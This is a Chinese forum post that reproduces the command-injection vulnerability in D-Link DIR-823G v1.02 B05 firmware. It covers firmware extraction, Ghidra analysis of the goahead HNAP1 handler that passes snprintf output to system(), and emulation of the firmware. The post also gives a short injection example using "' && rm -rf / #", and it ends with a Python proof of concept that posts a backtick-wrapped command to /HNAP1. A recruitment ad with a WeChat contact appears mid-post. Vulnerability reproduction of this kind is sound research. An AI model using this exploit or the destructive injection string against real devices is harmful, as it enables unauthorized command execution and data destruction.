路由器安全研究:D-Link DIR-823G v1.02 B05 复现与利用思路 ...

打印 上一主题 下一主题

主题 928|帖子 928|积分 2784

前言

D-Link DIR-823G v1.02 B05存在命令注入漏洞,攻击者可以通过POST的方式往 /HNAP1发送精心构造的请求,执行恣意的操纵系统命令。
漏洞分析

[img=720,331.74946004319656]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627654.png[/img]

binwalk提取固件,成功获取到固件。
[img=720,71.90283400809717]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627223.png[/img]

[img=720,108.87417218543047]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627189.png[/img]

现在我们已经进入到应用里了,那么我们在进行分析固件的时候,应该怎么去分析这个环境?起首,我们去分析别人的漏洞,别人是会告诉哪里会出现题目。但是我们现在假设我们是分析一个未知固件,我们就得先知道这个固件有哪些应用,启动了哪些服务,最清晰和简便的方式就是去看我们etc文件下面,内里有个叫init.d的目录,内里是关于启动项的内容。
[img=720,142.08]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627502.png[/img]

我们起首来看rcS下面的内容 vim rcS
起首是设置ip,然后挂载了两个文件系统分别是proc,这是与进程相关的文件系统,包括当前进程启动存放在哪个地址。
尚有ramfs文件系统,根据以前的笔记,可知ramfs文件系统跟RAM相关。
【----资助网安学习,以下全部学习资料免费领!加vx:yj520400,备注 “博客园” 获取!】
 ① 网安学习发展路径头脑导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)
然后下面就是判断是否尚有挂载别的文件系统。
然后mkdir就是创建各种各样的文件夹,都有对应的功能,比如说创建了pptp文件夹,针对拨号上网的功能,然后尚有smbd服务,可以看到创建了一个usb的文件夹,说明该固件有可以跟usb也就是U盘相关的操纵,接下来都是一些设置信息。
[img=720,499.54397394136805]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627508.png[/img]

继续往下翻
可以看到该固件启动了web server的web服务,也就是httpd的内容,这里启动的是goahead,通过这个名字,我们可以确定web服务就是goahead,假如想要分析web服务的话,就直接分析goahead就可以。
[img=720,368.48722986247543]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627492.png[/img]

我们回到squashfs-root目录下,搜索goahead的一些简朴环境
  1. grep -ir "goahead" .
复制代码
[img=720,143.37436640115857]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627772.png[/img]

最下面是两个启动项的内容,可以忽略,然后第一行是bin的可执行应用,这个着实就是我们最后分析的内容。
那如何分析呢?它是一个HNAP1请求,那就可以去检索我们的HANP1请求
  1. grep -ir "HNAP1" .
复制代码
[img=720,256.7]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627343.png[/img]

可以看到它检索到一些js代码,js代码对我们来说一样平常,(比较我们是找二进制相关的漏洞)
但是,我们可以发现它匹配了一个二进制程序,也就是goahead。
这里我们先科普一下goahead的一些环境:
GoAhead ,它是一个源码,免费、功能强大、可以在多个平台运行的嵌入式WebServer。
goahead的websUrlHandlerDefine函数答应用户自界说不同url的处理函数。
它在进行编写与它相关的请求,是通过websUrlHandlerDefine来确定的。
  1. websUrlHandlerDefine(T("/HNAP1"),NULL,0, websHNAPHandler,0);
  2. websUrlHandlerDefine(T("/goform"),NULL,0, websFormHandler,0);
  3. websUrlHandlerDefine(T("/cgi.bin"),NULL,0, websCgiHandler,0);
复制代码
使用ghidra进行逆向分析,goahead二进制文件在squashfs-root目录下的bin目录下
[img=720,422.09606986899564]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627266.png[/img]

那进入到goahead反编译界面该如何分析呢?一种是找到main函数去进行分析,比较耗时
一种是通过关键字来搜索,反推调用环境,来推测每个功能的解析环境 ctrl+shift+E

匹配成功,停在指定区域
[img=720,253.17073170731706]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627420.png[/img]

但是它所对应的反编译代码还是很多的,所以我们可以通过反编译出来的函数名,进行查看它的调用关系。
[img=720,412.994923857868]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171627726.png[/img]

一起往下翻,终于找到我们所要的东西
[img=720,360.46814044213266]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628708.png[/img]

而且我们看到,这个函数继续往上调的话就是main函数了,所以着实一开始也是可以从main函数来分析的(0.0)
所以现在我们可以重点来分析这个函数
[img=720,581.1251435132032]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628759.png[/img]

前面还是做一些判断,然后请求尚有不止HNAP1,对应的都是一个函数。
同一个函数做的事情,类似于websUrlHandlerDefine这个函数,那HANP1对应的函数是
FUN_0042383c,那就双击进去看看

这里就是漏洞点,这里执行了memset和snprintf,一样平常来说这里应该是不存在漏洞点,但是下面一条语句是system,也就是把格式化化的字符串直接就拿到了system函数作为参数转达进去,而snprintf这里的参数有个echo,有个单引号题目。
比如说正常代码
  1. #!/bin/bash
  2. read -p "Enter your name: " name
  3. echo 'Hello, '$name'!'
复制代码
攻击步调
正常输入:用户输入 Alice,输出:
  1. Hello, Alice!
复制代码
恶意输入:用户输入 '$(id)',此时脚本实际执行的命令变为:
  1. echo 'Hello, ''$(id)'!'
复制代码
输出:
  1. Hello, $(id)!
复制代码
单引号内的 $(id) 不会被执行,暂时安全。
更伤害的输入:用户输入 ' && rm -rf / #,命令变为:
  1. echo 'Hello, '' && rm -rf / #'!
复制代码
此时,第一个单引号被用户输入的 ' 闭合。&& rm -rf / 成为独立命令,在 echo 之后执行。# 注释掉后续的 '!,避免语法错误。
那么会导致rm -rf / 会被执行,删除系统文件!
所以,假如我们构造一些恶意的代码写入到snprintf中,再转达到system函数,就会造成命令注入漏洞。
但是我们要进到漏洞点的话,还需要满足函数上面的一些要求。
所以我们得符合上面函数的一些限制才能进入到漏洞点来,这里先取了PTR_s_SetMultipleActions_00588d80的首地址,赋值给DAT_0058a6c4,然后DAT_0058a6c4自身判断和自加2来进行循环判断,用strstr函数查找DAT_0058a6c4在param_+0x524中出现的位置,并赋值给pcVar1,假如pcVar1的值不为0的话,就会进入到我们的漏洞点来。

DAT_0058a6c4与PTR_s_SetMultipleActions_00588d80相关,双击进去看看
[img=720,457.9378881987578]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628065.png[/img]

可以看到内里都是它对应的一些方法,比如说SetMultipleActions之类的。
固件模仿

分析到这里,基本上是明朗了,接下来就要进行固件模仿操纵,使用firmadyne模仿固件启动。
[img=720,210.6474820143885]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628351.png[/img]
  1. sudo ./DIR823G_V1.0.2B05_20181207.sh
复制代码
然后firmadyne默认的暗码就是firmadyne
[img=720,504.35064935064935]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628624.png[/img]

得等一段时间,然后192.168.0.1
但是这个一直搞不定,模仿不起来,也不知道是什么缘故原由,排查不出。
然后换成了firmware analysis plus (fap)这个框架,就模仿起来了
[img=720,300.76561450638013]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628702.png[/img]

等一段时间后,回车,就可以模仿起来了,输入192.168.0.1
[img=720,415.5246523388116]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628002.png[/img]

进入向导,随便输入点东西
[img=720,483.5820895522388]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628608.png[/img]

[img=720,508.6342229199372]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628104.png[/img]

暗码8位,输入12345678
[img=720,481.4035087719298]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628170.png[/img]

然后就开始设置一些内容,同时可以注意到左侧已经把一些数据写入到关键的文件夹中
[img=720,354.92957746478874]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628775.png[/img]

设置完毕,登录,成功进入路由器
[img=720,391.0025706940874]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628957.png[/img]

exp编写
  1. #!/usr/bin/env python
  2. #-*- coding:utf-8 -*-
  3. import requests
  4. ip='192.168.0.1'
  5. command="'`echo aaaaaaaaa > /web_mtn/test.txt`'"
  6. length=len(command)
  7. headers=requests.utils.default_headers()
  8. headers["Content-Length"]=str(length)
  9. headers["User-Agent"]="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36"
  10. headers["SOAPAction"]='"http://purenetworks.com/HNAP1/GetClientInfo"'
  11. headers["Content-Type"]="text/xml; charset=UTF-8"
  12. headers["Accept"]="*/*"
  13. headers["Accept-Encoding"]="gzip, deflate"
  14. headers["Accept-Language"]="zh-CN,zh;q=0.9,en;q=0.8"
  15. payload=command
  16. r=requests.post('http://'+ip+'/HNAP1/', headers=headers, data=payload)
复制代码
因为是http请求,所以我们使用requests,然后设置ip,设置命令,构造报头,最后post请求将HNAP1,headers和payload都传过去。
[img=720,65.7]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202503171628439.png[/img]


复现完毕,ctrl+a 然后x结束固件模仿。
更多网安技能的在线实操练习,请点击这里>>
  

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

梦见你的名字

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表